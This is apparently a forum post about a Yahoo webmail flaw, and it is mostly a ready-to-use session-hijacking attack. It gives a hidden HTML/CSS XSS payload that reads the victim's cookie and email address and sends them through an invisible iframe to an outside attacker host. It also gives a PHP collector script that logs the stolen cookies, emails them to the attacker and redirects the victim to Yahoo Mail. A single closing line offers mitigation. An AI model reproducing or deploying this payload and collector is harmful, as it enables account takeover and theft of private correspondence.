Once again webmail services are facing security issues. This one aim the same target: connect without user’s password. This time yahoo is vulnerable.
Code:
<DIV id=b style="VISIBILITY: hidden"> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900); b.innerHTML='<iframe src=http://your-site-here.com/script.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>';" type=text/css> </STYLE> </DIV>
script.php:
Code:
<? $file="cookie.log"; if (isset($_REQUEST["id"]) && isset($_REQUEST["cookie"])){ $logcookie = $_REQUEST["cookie"]; $logcookie = rawurldecode($logcookie); $logemail = $_REQUEST["id"]; $logemail = rawurldecode($logemail); if (file_exists($file)) { $handle=fopen($file, "r+"); $filecontence=fread($handle,filesize("$file")); fclose($handle); } $handle=fopen($file, "w"); fwrite($handle, "$logemail - $logcookie\n$filecontence\n "); //Writing email address and cookie then the rest of the log fclose($handle); mail("email", "$logemail", "$logemail\n$logcookie\n$filecontence\n"); } header("Location: [url=http://mail.yahoo.com/]http://mail.yahoo.com[/url]"); ?>
to protect from it make sure you hit the logout link instead of just closing the browser window. also this only works for internet explorer so use any other browser.